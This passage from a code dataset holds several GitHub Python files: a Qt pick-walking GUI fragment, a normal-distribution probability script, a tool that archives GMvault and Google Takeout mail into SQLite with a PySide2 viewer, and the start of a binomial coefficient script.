Options were, \"{opt}\".'\n ''.format(mode=mode, opt=self.mode_options))\n\n self._current_mode = mode\n self.update_appearance()\n\n def clear_info_widgets(self):\n '''Delete all of the info widgets in the GUI.'''\n expand_layout = self.assignment_info_widget.expand_widget.layout()\n for index in reversed(range(expand_layout.count())):\n try:\n expand_layout.itemAt(index).widget().deleteLater()\n except AttributeError:\n pass\n\n def do_action(self):\n '''Do the associated action for the button that called this method.\n\n Note:\n This method relies on the objectName of the widget that calls it.\n The objectName is used by the controller to modify the loaded object.\n\n Raises:\n RuntimeError: If this method was not called from a Qt widget.\n\n '''\n try:\n direction = self.sender().objectName()\n except AttributeError:\n raise RuntimeError('do_action must be called from a Qt-signal')\n\n if self._current_mode == self.selection_mode_label:\n try:\n selected = self.controller.get_selection()[-1]\n except IndexError:\n return\n\n self.controller.do_motion(direction, selected)\n return\n\n # Add the selected object as the \"object to jump to\" for our loaded\n # object + the given direction\n #\n try:\n driven_object = self.controller.get_selection()[-1]\n except IndexError:\n pass\n else:\n opposite_directions = {\n 'up': 'down',\n 'down': 'up',\n 'left': 'right',\n 'right': 'left',\n }\n self.controller.assign(self.loaded_object, direction, driven_object)\n if self.is_pairing_enabled():\n self.controller.assign(\n driven_object,\n opposite_directions[direction],\n self.loaded_object)\n\n self.update_appearance()\n\n def toggle_mode(self):\n '''Change from Selection Mode to Assignment Mode or vice-versa.'''\n index_for_the_new_mode = 1 - self.mode_options.index(self._current_mode)\n mode_label = self.mode_options[index_for_the_new_mode]\n self.set_mode(mode_label)\n\n modes = {\n self.selection_mode_label: 'selection',\n self.assignment_mode_label: 'assignment',\n }\n\n try:\n mode_property = modes[mode_label]\n except KeyError:\n mode_property = ''\n\n self.mode_button.setProperty('mode', mode_property)\n self.mode_button.style().unpolish(self.mode_button)\n self.mode_button.style().polish(self.mode_button)\n\n def update_appearance(self):\n '''Set the GUI's widget colors and options based on our stored info.'''\n self.loaded_object_widget.setText(\n 'Click \"{label}\"'.format(label=self.manager.main_widget.text()))\n\n # Repopulate the assignment details for the loaded object\n self.clear_info_widgets()\n\n reference_object = None\n\n if self._current_mode == self.assignment_mode_label:\n reference_object = self.loaded_object\n elif self._current_mode == self.selection_mode_label:\n try:\n reference_object = self.controller.get_selection()[-1]\n except IndexError:\n pass\n\n info = self.controller.get_settings(reference_object)\n\n for key in sorted(info.keys()):\n if self.is_load_selection_widget(key):\n continue\n\n assigned_direction_object = info[key]\n self.assignment_info_widget.add_widget(\n self._make_info_line_widget(key, assigned_direction_object))\n\n is_assignment_mode = self._current_mode == self.assignment_mode_label\n\n if is_assignment_mode and self.has_loaded_object():\n self.loaded_object_widget.setText(\n self.controller.get_object_name(reference_object))\n\n self.load_widget.setVisible(is_assignment_mode)\n self.autopair_check_box.setVisible(is_assignment_mode)\n self.manager.main_widget.setEnabled(is_assignment_mode)\n 
self.manager.main_widget.setVisible(is_assignment_mode)\n\n if is_assignment_mode and self.has_loaded_object():\n self.manager.main_widget.setProperty('status', 'okay')\n else:\n self.manager.main_widget.setProperty('status', 'not_okay')\n\n self.manager.main_widget.style().unpolish(self.manager.main_widget)\n self.manager.main_widget.style().polish(self.manager.main_widget)\n\n self.mode_button.setText(self._current_mode)\n","repo_name":"ColinKennedy/pickrunner","sub_path":"scripts/pickrunner/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":16197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"26796333838","text":"maxWeight = float(input())\nnumberOfBoxes = float(input())\nmeanWeight = float(input())\nstdDev = float(input())\n\nimport math\n\ndef lessThan(x, mean, stdDev):\n\tresult = 0.5 * (1 + math.erf((x-mean) / (stdDev * math.sqrt(2))))\n\n\treturn round(result,4)\n\nprint (lessThan(maxWeight, numberOfBoxes * meanWeight, math.sqrt(numberOfBoxes) * stdDev))","repo_name":"hebertomoreno/PythonScr","sub_path":"clt.py","file_name":"clt.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"25919888680","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Adrien Demarez\nLicense: GPLv3 https://www.gnu.org/licenses/gpl-3.0.en.html\n\nThis program\n- walks through a folder from a GMvault backup (assuming .eml are not gzipped. In my case I archived the whole dir in squashfs-lzma so it was better to leave the eml uncompressed) and parses the .meta and .eml files, the latter can be MIME with various encoding, attachments, etc.\n- or walks through an mbox file (only tested with mbox from Google Takeout, noting that Google performs some encoding conversions that permanently break all non-ascii characters (they are all replaced by 0xEFBFBD, therefore encoding display issues are not a bug in this script but in the prior encoding bugs on Google Takeout side))\n- stores the emails (header, txt, html, signatures) in an SQLite database. For HTML, the attached images are extracted and inserted as base64 embedded images within the html in order to avoid keeping a separate file\n- extracts the other attached files to a dedicated folder (so all the attached files can be accessed directly through the filesystem). If the same file (same name, same md5) has already been extracted, it will not be stored twice. If a file with similar name but different md5 has already been extracted, it will be stored with a different name\n- adds a small GUI to walk through the emails and add additional \"where\" conditions to the SQL query (for the moment it works with plain sqlite including \"like\" clauses. In the future I will test SQLite's full-text search features)\n\nTODO: (among other things)\n- refactor code. Put functions within the dedicated DB class\n- solve encoding issues for HTML\n- DB schema is simple but not optimal (3NF, etc)\n- implement full-text search with sqlite\n- look deeper in winmail.dat (rtf attachments ?) 
and oledata.mso\n...\n\"\"\"\n\nimport sqlite3\nimport json\nimport sys\nimport re\n\n#import mailparser # I realized afterwards that https://pypi.org/project/mail-parser/ might have done the job instead of writing custom decodemail() / decodepart() routines, but I didn't really test so for the moment I'll keep my own code :)\n#from email.iterators import _structure\nimport email,quopri\n#import email.contentmanager # FIXME: not used ?\nfrom werkzeug.utils import secure_filename\n\nimport hashlib\n#import xxhash # might replace md5 in the future since I don't need a cryptographically secure hash\n\nimport os,sys\n#import io # FIXME: unused ?\nimport time\nfrom datetime import datetime\nfrom dateutil.parser import parse as dateparse\n\nfrom PySide2.QtWidgets import *\n#from PySide2.QtWebEngineWidgets import *\nfrom PySide2.QtCore import *\nfrom PySide2.QtSql import *\nfrom PySide2.QtGui import *\nimport argparse\n\ndef gui(dbfile):\n #cwd = '' if os.path.dirname(dbfile).startswith('/') else os.getcwd()+'/'\n def loadmsg(item):\n myquery = QSqlQuery()\n myquery.exec_(\"select body_text,body_html,attachments,gmail_labels from messages where id=%d\" % (item.siblingAtColumn(0).data()))\n myquery.next()\n data=myquery.value(1) # value(1) is html, value(0) is plain text\n if data==None or data==\"\":\n data = \"<html><head><title>foobar
\" + myquery.value(0) + \"
\" # displays body_text when there is no html\n else:\n data = re.sub(r'<(meta|META) .*charset=.*>', '', data) # we already converted to utf-8 when storing html in SQLite so we filter lines such as \n\n local_textBrowser.setHtml(data)\n # I used to do local_webEngineView.setHtml(data), but setHtml has a 2MB size limit => need to switch to setUrl on tmp file for large contents\n # tmpfile = '/tmp/gmvault_sqlite_tmp.html' # FIXME: random tmp name. FIXME: delete the tmp file when it's no longer needed\n # with open(tmpfile, 'wb') as fp:\n # fp.write(data.encode())\n # local_webEngineView.setUrl(QUrl('file://' + tmpfile))\n attachlist.clear()\n for att in myquery.value(2).split('¤'):\n item = QListWidgetItem(att)\n item.setData(1, os.path.dirname(os.path.abspath(dbfile))+'/'+myquery.value(3)+'/'+att)\n #item.setData(1, cwd+os.path.dirname(dbfile)+'/'+myquery.value(3)+'/'+att)\n attachlist.addItem(item)\n\n def model_update(item=None):\n if(item != None):\n #tmp = \"labels='%s'\" % (item.data(),)\n tmp = \"labels='%s'\" % (item.siblingAtColumn(1).data(),)\n else:\n tmp=lineedit.text()\n if tmp!=None and tmp!=\"\":\n tmp=\" where \" + tmp\n model.clear()\n model.setQuery(db.exec_(\"select id, gmail_threadid thread, gm_id eml, gmail_labels labels, datetime(messages.datetime, 'unixepoch') as dt, msgfrom, msgto, msgcc, subject, flags, signature, attachments,size,sizeatt,numatt from messages\" + tmp))\n #model.setQuery(db.exec_(\"select id, gmail_threadid thread, gm_id eml, gmail_labels labels, datetime(messages.datetime, 'unixepoch') as dt, msgfrom, msgto, msgcc, subject, flags, signature, attachments from messages\" + tmp))\n while model.canFetchMore():\n model.fetchMore()\n #model.select()\n\n def createtreeitem(name): # recursive creation of parents items\n if name in itemlist:\n return itemlist[name]\n elif '/' in name:\n idx = name.rfind('/')\n parentitem = createtreeitem(name[:idx])\n item = QTreeWidgetItem(None, [name[idx+1:], name] )\n itemlist[name] = item\n parentitem.addChild(item)\n return item\n else:\n item = QTreeWidgetItem(None, [name, name] )\n itemlist[name] = item\n foldertree.insertTopLevelItem(0,item)\n return item\n\n app = QApplication(sys.argv)\n\n tabview = QTableView()\n tabview.clicked.connect(loadmsg)\n tabview.setVerticalScrollMode(QAbstractItemView.ScrollPerPixel)\n tabview.setHorizontalScrollMode(QAbstractItemView.ScrollPerPixel)\n # folderlist = QListWidget()\n # folderlist.clicked.connect(model_update)\n foldertree = QTreeWidget()\n foldertree.setColumnCount(2)\n foldertree.hideColumn(1)\n foldertree.clicked.connect(model_update)\n\n # local_webEngineView = QWebEngineView()\n local_textBrowser = QTextBrowser() # Actually QTextBrowser is enough to display basic HTML (including images) without js and without security issues that might arise with QWebEngineView parsing potentially hostile HTML...\n #local_textBrowser.setStyleSheet(\"background-color: black;\")\n attachlist = QListWidget()\n attachlist.doubleClicked.connect(lambda item: QDesktopServices.openUrl(QUrl.fromLocalFile(item.data(1))))\n #attachlist.doubleClicked.connect(lambda item: print(item.data(1)))\n\n splitter_left = QSplitter(Qt.Vertical)\n splitter_left.addWidget(tabview)\n #splitter_left.addWidget(local_webEngineView)\n splitter_left.addWidget(local_textBrowser)\n splitter_left.setSizes([800,800])\n splitter_right = QSplitter(Qt.Vertical)\n #splitter_right.addWidget(folderlist)\n splitter_right.addWidget(foldertree)\n splitter_right.addWidget(attachlist)\n splitter_right.setSizes([800,200])\n 
splitter = QSplitter(Qt.Horizontal)\n splitter.addWidget(splitter_left)\n splitter.addWidget(splitter_right)\n splitter.setSizes([800,200])\n #splitter.setStretchFactor(0,8)\n\n vbox = QVBoxLayout()\n vbox.addWidget(splitter)\n\n mainWin = QWidget()\n mainWin.setLayout(vbox)\n\n lineedit=QLineEdit()\n lineedit.returnPressed.connect(model_update)\n\n toolbar = QToolBar()\n toolbar.addWidget(lineedit)\n\n mainwin2 = QMainWindow()\n mainwin2.setCentralWidget(mainWin)\n mainwin2.addToolBar(toolbar)\n\n availableGeometry = app.desktop().availableGeometry(mainWin)\n mainwin2.resize(availableGeometry.width() * 2 / 3, availableGeometry.height() * 2 / 3)\n\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\n db.setDatabaseName(dbfile)\n if not db.open():\n print(\"cannot open DB\")\n return\n\n myquery2 = db.exec_(\"select gmail_labels labels from messages group by labels order by labels\")\n itemlist = {}\n while myquery2.next():\n # folderlist.addItem(myquery2.value(0))\n createtreeitem(myquery2.value(0))\n\n model=QSqlTableModel()\n model_update()\n tabview.setModel(model)\n\n mainwin2.show()\n app.exec_()\n\n# for winmail.dat\nfrom tnefparse.tnef import TNEF, TNEFAttachment, TNEFObject\nfrom tnefparse.mapi import TNEFMAPI_Attribute\ndef my_tnef_parse(filepath=\"winmail.dat\"):\n t = TNEF(open(filepath).read(), do_checksum=True)\n for a in t.attachments:\n with open(a.name, \"wb\") as afp:\n afp.write(a.data)\n sys.exit(\"Successfully wrote %i files\" % len(t.attachments))\n\ndef md5sum(filename, blocksize=65536):\n hash = hashlib.md5()\n with open(filename, \"rb\") as f:\n for block in iter(lambda: f.read(blocksize), b''):\n hash.update(block)\n return hash.hexdigest()\n\ndef dateparse_normalized(datestr):\n datestr=datestr.replace('+0000 GMT','GMT') # \"+0000 GMT\" raises an error in the date parser\n for tmp in datestr.split(','): # Remove everything before and after (potential) comma, since they are error prone (e.g. if the string starts with \"Wen, ...\" instead of \"Wed, ...\" the parser would fail without this. Same with regards to the end of the string)\n if re.search(r'..:..:..', tmp):\n #tmp = re.sub(r'(.*..:..:..) .*', '\\\\1', tmp)\n tmp = re.sub(r'(.*..:..:[^\\(]*).*', '\\\\1', tmp) # FIXME: keep year e.g. in case of 'Wed Feb 29 07:02:03 +0000 2012'\n break\n return int(datetime.timestamp(dateparse(tmp)))\n # FIXME \"UnknownTimezoneWarning: tzname EDT identified but not understood. Pass `tzinfos` argument in order to correctly return a timezone-aware datetime. In a future version, this will raise an exception.\"\n\ndef cset_sanitize(cset):\n if cset==None or cset==\"utf-8//translit\" or cset=='utf8':\n cset=\"utf-8\"\n elif cset=='iso-2022-cn': # this codec is not supported in Python, and they don't care (bug report https://bugs.python.org/issue2066 is closed with status WONTFIX)\n cset='iso-2022-jp-2' # FIXME: not sure at all and I know nothing about those iso-2022 encodings, but looking at https://docs.python.org/2/library/codecs.html#standard-encodings I wonder whether it might be an alternative ? Anyway I have to choose something...\n elif cset=='IBM-eucKR':\n cset='euc_kr'\n elif cset.startswith('windows-1252'): # There was a bug with charset=\"windows-1252http-equivContent-Type\"\n cset='windows-1252'\n elif cset=='windows-874':\n cset='iso-8859-11' # FIXME: also not sure...\n elif cset.startswith('charset'):\n cset=cset[cset.find('\"')+1:cset.rfind('\"')]\n try: # got weird charset names such as \"charset=y\" or \"charset=x-binaryenc\". 
Default is to use utf-8 in case of an unknown charset\n 'a'.encode(cset)\n except LookupError:\n print(\"\\nUnsupported charset : \" + cset)\n cset='utf-8'\n return cset\n\ndef qdecode(qstr):\n # parse the \"Q-encoding\" (not exhaustive, but it works for my cases)\n #if myfield_qp_list[2] in [\"Q\", \"B\", 'q', 'b']:\n #cset = cset_sanitize(myfield_qp_list[1])\n #myfield_val = myfield_qp_list[3].replace('_', ' ')\n #else:\n #myfield_val = msg[myfield][2:-2].replace('_', ' ')\n if qstr.startswith('=?'):\n qlist = qstr.split('?')\n if qlist[2] in [\"Q\", \"B\", 'q', 'b']:\n cset = cset_sanitize(qlist[1]) # FIXME: what if multiline q-entry has different encoding between lines ? (can it happen ?)\n ret_tmp = \"\"\n nlines = int((len(qlist) - 1) / 4)\n for k in range(nlines):\n ret_tmp += qlist[3+4*k]\n try:\n ret = quopri.decodestring(ret_tmp).decode(cset)\n except UnicodeDecodeError:\n ret = quopri.decodestring(ret_tmp).decode('iso8859-1') # Handle case where utf-8 is announced but the real encoding is different (I only got this bug once and the real encoding was iso8859-1). FIXME: handle more cases i.e. guess the real encoding\n except ValueError:\n ret_tmp = quopri.encodestring(ret_tmp.encode())\n ret = quopri.decodestring(ret_tmp).decode(cset)\n return ret\n return qstr\n\ndef mbox_messages(mboxfile):\n # Generator sending messages one-by-one from mbox. I wrote this after observing that mailbox.mbox(mboxfile) took several minutes before returning the first message (it seems it needs to load/parse the whole mbox before starting, which can take long in the case of large mbox files...)\n lprev=''\n text=''\n with open(mboxfile,'r',encoding='utf8') as f:\n for line in f:\n if line.startswith('From ') and lprev=='\\n' and \"@xxx\" in line: # FIXME: more reliable trigger ?\n #msg = email.message_from_bytes(text.encode())\n msg = email.message_from_string(text)\n msg.set_unixfrom(line) # FIXME: takes the \"from\" of next message instead of current\n text=''\n yield msg\n lprev=line\n text+=line\n\nimport mmap\ndef mbox_messages2(mboxfile):\n # Alternative approach. May be deleted later since it does not fix encoding issues (which are introduced by Google Takeout...). 
Need to check which version is faster\n text=b''\n mlen = os.path.getsize(mboxfile)\n with open(mboxfile,'r+b') as f:\n mm = mmap.mmap(f.fileno(), 0)\n i1=0\n while i1 < mlen:\n i2 = mm.find(b'\\r\\n\\r\\nFrom ', i1) # FIXME: more reliable trigger ?\n if i2==-1: # FIXME: needed ?\n print('ret')\n return\n text = mm[i1:i2]\n i3=text.find(b'\\r\\nX-GM-THRID:')\n msg = email.message_from_bytes(text)\n msg.set_unixfrom(text[:i3].decode())\n i1=i2+4 # +4 is to account for '\\r\\n\\r\\n'\n yield msg\n\n#import mailbox\ndef scan_mbox(mboxfile, outdir):\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n if os.path.exists(outdir+'/mails.db'):\n db=MDB(outdir+'/mails.db') # don't \"drop table if exists\"\n else:\n db=MDB(outdir+'/mails.db')\n db.createdb()\n mbox_size = os.path.getsize(mboxfile)\n #mbox = mailbox.mbox(mboxfile) # FIXME: slow\n k=0\n ltot=0\n for message in mbox_messages(mboxfile): #mbox.items():\n #for key,message in mbox.items():\n mfrom=message.get_unixfrom().replace('\\n','') # in the case of gmail mbox, includes gmail_id followed by date\n flags = []\n labels = []\n if 'X-Gmail-Labels' in message:\n entries= qdecode(message['X-Gmail-Labels']).replace('_', ' ').split(',')\n for l in entries:\n if l.startswith('[') or l.startswith('IMAP '):\n continue\n elif l in ('Ouvert','Non lus','Important','Favoris','Non lus'):\n flags.append(l)\n else:\n labels.append(l)\n labelstr = '_'.join(labels) if labels!= [] else None\n\n #print(mfrom)\n #mfrom=message.get_from() # in the case of gmail mbox, includes gmail_id followed by date\n msgdec=decodemail(message, outdir, labelstr)\n if msgdec == None:\n continue\n msgdec[\"msg_id\"] = None\n msgdec[\"thread_id\"] = int(msgdec[\"X-GM-THRID\"])\n msgdec[\"gm_id\"] = mfrom.split('@xxx')[0] #int(msgjson['gm_id'])\n msgdec['flags'] = '_'.join(flags) if flags!= [] else None\n #msgdec['gmail_timestamp']=datetime.fromtimestamp(msgjson['internal_date'])\n db.addmail(msgdec)\n db.conn.commit()\n k+=1\n ltot+=len(message.as_string())\n sys.stderr.write(f\"\\r\\033[KProcessing message {k} ({ltot>>20}/{mbox_size>>20} MB) : {msgdec['Date']}\")\n\ndef scandir_gmvault(rootdir, outdir, includelist=[]): # '2009-01'\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n if os.path.exists(outdir+'/mails.db'):\n db=MDB(outdir+'/mails.db') # don't \"drop table if exists\"\n else:\n db=MDB(outdir+'/mails.db')\n db.createdb()\n for dirname,_,files in os.walk(rootdir):\n included=False\n for k in includelist:\n if k in dirname:\n included=True\n break\n if included==False and len(includelist)>0:\n continue\n for entry in files:\n if entry.endswith(\".meta\"):\n continue\n id = entry[:entry.rfind('.eml')]\n if db.checkmail(id):\n sys.stderr.write(\"\\r\\033[KSkipping: \" + id)\n continue\n msgjson=decodejson(dirname+'/'+id+\".meta\")\n\n # Process labels\n # Labels are concatenated into a single string (so it can correspond to a folder on the filesystem).\n labels = [l.replace('\\\\','') for l in msgjson['labels'] if not l.startswith('\\\\') or l in ('\\\\Sent', '\\\\Inbox')]\n flags = [f.replace('\\\\','') for f in msgjson['flags']]\n flags.extend([l.replace('\\\\','') for l in msgjson['labels'] if l.startswith('\\\\') and not l in ('\\\\Sent', '\\\\Inbox')])\n if len(labels)>1: # some labels are included in others and repeated multiple times => keep the longest (most complete) one\n for l1 in labels:\n for l2 in labels:\n if l1!=l2 and l2.startswith(l1):\n labels.remove(l1)\n if \"Inbox\" in labels and \"Sent\" in labels:\n labels.remove('Inbox')\n if 
labels==[]:\n labels=['Inbox']\n labelstr='__'.join(labels).replace('\\\\', '').replace(\"[\",'_').replace(']','_')\n if 'portant' in labelstr or \"imap\" in labelstr or \"tarred\" in labelstr: # Important|imap|Starred\n print(\"Processing: \" + dirname+'/'+entry)\n print(labels)\n\n if not os.path.exists(outdir + '/' + labelstr):\n os.makedirs(outdir + '/' + labelstr)\n\n with open(dirname+'/'+entry) as fp:\n #msg = email.parser.Parser().parse(fp)\n msg=email.message_from_file(fp)\n msgdec = decodemail(msg, outdir, labelstr)\n if msgdec == None:\n continue\n msgdec[\"msg_id\"]=msgjson[\"msg_id\"]\n msgdec[\"thread_id\"] = int(msgjson[\"thread_ids\"])\n msgdec[\"gm_id\"] = int(msgjson['gm_id'])\n msgdec['flags'] = '_'.join(flags)\n msgdec['gmail_timestamp']=datetime.fromtimestamp(msgjson['internal_date'])\n db.addmail(msgdec)\n sys.stderr.write(\"\\r\\033[KProcessing: \" + entry + ', date : ' + msgdec['Date'])\n db.conn.commit()\n\ndef decodemail(msg, outdir1, labelstr='Default'):\n #_structure(msg)\n csets=msg.get_charsets()\n cset='utf-8'\n for c in csets:\n if c==None:\n continue\n if c.startswith('charset'):\n c=c[c.find('\"')+1:c.rfind('\"')]\n cset=cset_sanitize(c)\n break\n\n msgdec={}\n for myfield in ('From', 'To', 'Cc', 'Bcc', 'Date', 'Subject', 'X-GM-THRID'): # \"Received\"\n if myfield in msg:\n msgdec[myfield]=qdecode(msg[myfield]).replace('_', ' ')\n else:\n msgdec[myfield] = None\n if msgdec['Date']==None:\n mfrom=msg.get_unixfrom() # in the case of gmail mbox, includes gmail_id followed by date\n #mfrom=msg.get_from() # in the case of gmail mbox, includes gmail_id followed by date\n msgdec['Date'] = mfrom.replace('\\n','').split('@xxx ')[1]\n\n #labelstr = msgdec['X-Gmail-Labels'] if 'X-Gmail-Labels' in msgdec and msgdec['X-Gmail-Labels']!=None else labelstr\n outdir= outdir1 + '/' + labelstr\n msgdec['Attachments'] = []\n msgdec['EmbeddedImg'] = {}\n msgdec['Size'] = 0\n msgdec['SizeAtt'] = 0\n msgdec['NumAtt'] = 0\n msgdec['Outdir'] = outdir\n msgdec['labelstr'] = labelstr\n msgdec['Date_parsed'] = dateparse_normalized(msgdec['Date'])\n\n #body2=msg.get_body(preferencelist=('plain', 'html'))\n decodepart(msg, msgdec) # recursive part\n if not 'Body' in msgdec and not 'BodyHTML' in msgdec:\n return None\n\n if not \"BodyHTML\" in msgdec and \"Body\" in msgdec and msgdec['Body'].find('[cid:') and len(msgdec['EmbeddedImg'].keys())>0:\n # When there is only plain text together with embedded images, generate the corresponding HTML with references to images\n msgdec[\"BodyHTML\"] = \"
\" + re.sub(r'\\[(cid:.*)\\]', '', msgdec['Body']) + \"
\"\n if 'BodyHTML' in msgdec and msgdec['BodyHTML'].find(' rename new files with __2, __3, etc.\n ki=filename.rfind('.')\n if ki>0:\n k_base=filename[:ki]\n k_ext=filename[ki:]\n else:\n k_base=filename\n k_ext=\"\"\n rx = re.search(r'([^_\\.]+)__([0-9]+)',k_base)\n if rx:\n filename = rx.group(1) + '__' + str(int(rx.group(2))+1) + k_ext\n else:\n filename = k_base + '__2' + k_ext\n\n with open(dir+'/'+filename, 'wb') as fp:\n fp.write(filecontents)\n os.utime(dir+'/'+filename, (msgdec[\"Date_parsed\"],msgdec[\"Date_parsed\"]))\n msgdec['Attachments'].append(filename)\n msgdec['SizeAtt'] += len(filecontents)\n msgdec['NumAtt'] += 1\n return filename\n\n while isinstance(part.get_payload(),email.message.Message):\n part=part.get_payload()\n if part.is_multipart():\n for subpart in part.get_payload():\n decodepart(subpart, msgdec, level+1) # recursive call (theoretically there could be any structure and any levels of nested messages)\n #if ctype==\"multipart/alternative\":\n # pass\n #elif ctype==\"multipart/related\":\n # pass\n\n else:\n ctype = part.get_content_type()\n cset=cset_sanitize(part.get_content_charset())\n dir=msgdec['Outdir']\n #print(' '*level + 'L' + str(level) + ' -> content-type : ' + ctype + ', cset=' + cset)\n if(ctype==\"text/plain\" and not \"Body\" in msgdec): # FIXME: we didn't check whether we are really in a \"multipart/alternative\" section\n try:\n body = part.get_payload(decode=True).decode(cset)\n except UnicodeDecodeError:\n body = part.get_payload(decode=False)\n msgdec['Body'] = body # FIXME: change meta charset to utf-8\n elif(ctype==\"text/html\" and not \"BodyHTML\" in msgdec): # FIXME: we didn't check whether we are really in a \"multipart/alternative\" section\n try:\n body = part.get_payload(decode=True).decode(cset)\n except UnicodeDecodeError:\n body = part.get_payload(decode=False)\n msgdec['BodyHTML'] = body\n elif \"Content-ID\" in part and ctype.startswith(\"image\"): # FIXME: we didn't check whether we are really in a \"multipart/related\" section\n cid=part[\"Content-ID\"][1:-1]\n body=cid\n msgdec['EmbeddedImg'][cid]=\"data:\"+ctype+\";base64,\"+part.get_payload(decode=False).replace('\\n','')\n elif part.get_filename(): # FIXME: we didn't check whether we are really in a \"multipart/mixed\" section\n #if ctype.startswith(\"application\") or ctype.startswith(\"multipart\"):\n #filename2=email.utils.collapse_rfc2231_value(filename2).strip()\n #filename2=part.get_param('filename', None, 'content-disposition')\n filename=part.get_filename()\n filename = qdecode(filename)\n filecontents = part.get_payload(decode=True)\n if (filename==\"signature.asc\" or filename=='PGP.sig') and not 'signature' in msgdec:\n msgdec['signature'] = filecontents.decode()\n #elif filename==\"smime.p7s\": # FIXME: check contents beyond file name\n # msgdec['signature'] = part.get_payload(decode=False)\n # elif filename=='oledata.mso':\n # pass # FIXME: handle this\n elif filename=='winmail.dat':\n k=extract_file(dir, 'winmail.dat', filecontents) # FIXME: not needed anymore after we extract the other stuffs (embedded RTF, etc)\n t = TNEF(filecontents, do_checksum=True)\n #print(t.codepage)\n #t.dump(force_strings=True)\n if hasattr(t,'body'):\n data=getattr(t, 'body')\n if isinstance(data,str):\n data=data.encode()\n extract_file(dir,secure_filename(k)+'.txt', data)\n if hasattr(t,'htmlbody'):\n data=getattr(t, 'htmlbody')\n if isinstance(data,str):\n data=data.encode()\n extract_file(dir,secure_filename(k)+'.html', data)\n if hasattr(t,'rtfbody'):\n data=getattr(t, 
'rtfbody')\n if isinstance(data,str):\n data=data.encode()\n extract_file(dir,secure_filename(k)+'.rtf', data)\n\n for a in t.attachments:\n winname = 'winmail_'+secure_filename(a.long_filename())\n # if isinstance(a._name, bytes):\n # winname=a._name.decode('cp1252').strip('\\x00')\n # else:\n # winname=a._name.strip('\\x00')\n if isinstance((a.data), bytes):\n dat=a.data\n elif isinstance((a.data), list):\n dat=a.data[0]\n extract_file(dir, winname, dat)\n else:\n filename = secure_filename(filename)\n if filename==None or filename==\"\":\n filename=\"__noname__\" + ctype.replace('/','_')\n extract_file(dir, filename, filecontents)\n else:\n body=\"__None__\" #+ str(part.get_payload(decode=True))\n\ndef decodejson(filename):\n with open(filename) as fp:\n my_json = json.loads(fp.read())\n return my_json\n\nclass MDB():\n def __init__(self, dbname, domagic=False):\n self.conn = sqlite3.connect(dbname)\n #self.init_path=init_path.rstrip('/')\n\n def createdb(self):\n cur = self.conn.cursor() # FIXME: \"contacts\" and \"attachment\" tables are still unused\n cur.executescript('''\n drop table if exists messages;\n create table messages(\n id integer primary key autoincrement,\n gmail_msgid text,\n gmail_threadid integer,\n gmail_labels text,\n gm_id integer,\n datetime integer,\n msgfrom integer,\n msgto text,\n msgcc text,\n subject text,\n body_text text,\n body_html text,\n attachments text,\n flags text,\n signature text,\n size integer,\n sizeatt integer,\n numatt integer\n );\n create index messages_gm_id_idx on messages(gm_id);\n\n PRAGMA main.page_size=4096;\n PRAGMA main.cache_size=10000;\n PRAGMA main.locking_mode=EXCLUSIVE;\n PRAGMA main.synchronous=NORMAL;\n ''') # PRAGMA main.journal_mode=WAL;\n\n def checkmail(self, gm_id):\n cur = self.conn.cursor()\n rs=cur.execute('select id from messages where gm_id=?', (gm_id,)).fetchall()\n if len(rs)>0:\n return True\n return False\n\n def addmail(self, m):\n cur = self.conn.cursor()\n cur.execute(\"insert into messages values (null, ?,?,?,?, ?,?,?,?, ?,?,?,?, ?, ?,?,?,?)\", (\n m[\"msg_id\"], m[\"thread_id\"], m['labelstr'], m['gm_id'],\n int(m['Date_parsed']), m['From'], m['To'], m['Cc'],\n m[\"Subject\"], m['Body'], m['BodyHTML'], '¤'.join(m[\"Attachments\"]), m['flags'], m[\"signature\"],\n m[\"Size\"],m[\"SizeAtt\"],m[\"NumAtt\"]\n ))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(dest=\"subcommand\", required=True)\n\n parser_createdb = subparsers.add_parser('createdb', help=\"Scan directory\")\n parser_createdb.add_argument(\"gmvault_dir\", help=\"GMVault dir or mountpoint\")\n parser_createdb.add_argument(\"outdir\", help=\"Output dir\")\n\n parser_mbox = subparsers.add_parser('mbox', help=\"Scan MBox from Google Takeout\")\n parser_mbox.add_argument(\"mboxfile\", help=\"MBox file\")\n parser_mbox.add_argument(\"outdir\", help=\"Output dir\")\n\n parser_gui = subparsers.add_parser('gui', help=\"Launch GUI\")\n parser_gui.add_argument(\"dbfile\", help=\"DB file\")\n\n args = parser.parse_args()\n\n if args.subcommand==\"createdb\":\n scandir_gmvault(args.gmvault_dir + \"/db\", args.outdir)\n elif args.subcommand==\"mbox\":\n scan_mbox(args.mboxfile,args.outdir)\n elif args.subcommand==\"gui\":\n gui(args.dbfile)\n","repo_name":"karteum/gmvaultdb","sub_path":"gmvaultdb.py","file_name":"gmvaultdb.py","file_ext":"py","file_size_in_byte":31305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} 
+{"seq_id":"73240387010","text":"'''\nTitulo: Calculo de coeficiente binomial\nDescripcion: A partir de un numero solicitado al usuario y un coeficiente tambien solicitado al usuario, el programa realiza el calculo del coeficiente binomial a partir de estos numeros\nFecha: 16 de Mayo del 2022\nAutor: Espinoza Bautista Daniel\n'''\n# Importamos las librerias\nfrom time import time\n\ndef calBinomial(n, k, dp):\n \n # Si el valor esta en la tabla de busqueda se regresa el valor\n if dp[n][k] != -1:\n return dp[n][k]\n \n # Guardamos el valor en la tabla y posteriormente lo regresamos\n if k == 0:\n dp[n][k] = 1\n return dp[n][k]\n \n # Si se encuentra el numero regresamos el valor del numero y lo guardamos\n if k == n:\n dp[n][k] = 1\n return dp[n][k]\n \n # Guardamos el valor en la tabla de busqueda y realizamos el corrimiento del arreglo para realizar la busqueda\n dp[n][k] = (calBinomial(n-1, k-1, dp) +\n calBinomial(n-1, k, dp))\n \n # Regresamos el arreglo de la tabla de busqueda\n return dp[n][k]\n\ndef binomial(n, k):\n \n # Creamos una tabla de busqueda temporal\n dp = [ [ -1 for y in range(k + 1) ]\n for x in range(n + 1) ]\n \n # Realizamos el chequeo de 